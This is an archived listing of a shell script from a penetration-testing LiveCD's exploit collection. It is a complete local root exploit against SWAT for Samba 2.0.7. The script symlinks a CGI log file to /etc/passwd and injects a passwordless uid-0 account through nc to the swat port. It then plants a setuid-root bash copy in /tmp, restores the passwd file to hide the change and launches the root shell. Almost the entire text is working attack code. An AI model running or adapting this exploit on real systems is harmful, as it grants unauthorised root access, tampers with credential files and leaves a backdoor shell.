home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / samba / swat-exp.sh < prev   
Linux/UNIX/POSIX Shell Script  |  2005-02-12  |  889b  |  32 lines
  1. #!/bin/sh
  2. # swat for samba 2.0.7 compiled with cgi logging exploit
  3. # discovered by miah <miah@uberhax0r.net>
  4. # exploit by optyx <optyx@uberhax0r.net>
  5. if [ -f /tmp/cgi.log ]; then
  6. if [ `rm -f /tmp/cgi.log` ]; then
  7. echo "/tmp/cgi.log exists and cannot be deleted"
  8. exit
  9. fi
  10. fi
  11. echo "backing up /etc/passwd"
  12. cp -pd /etc/passwd /tmp/.bak
  13. touch -r /etc/passwd /tmp/.bak
  14. ln -s /etc/passwd /tmp/cgi.log
  15. echo "connecting to swat"
  16. echo -e "uberhaxr::0:0:optyx r0x y3r b0x:/:/bin/bash\n"| nc -w 1 localhost swat
  17. if [ `su -l uberhaxr -c "cp /bin/bash /tmp/.swat"` ]; then
  18. echo "exploit failed"
  19. rm /tmp/.bak
  20. rm /tmp/cgi.log
  21. exit
  22. fi
  23. su -l uberhaxr -c "chmod u+s /tmp/.swat"
  24. echo "restoring /etc/passwd"
  25. su -l uberhaxr -c "cp -pd /tmp/.bak /etc/passwd; \
  26. chown root.root /etc/passwd; \
  27. touch -r /tmp/.bak /etc/passwd"
  28. rm /tmp/.bak
  29. rm /tmp/cgi.log
  30. echo "got root? (might want to rm /tmp/.swat)"
  31. /tmp/.swat
  32.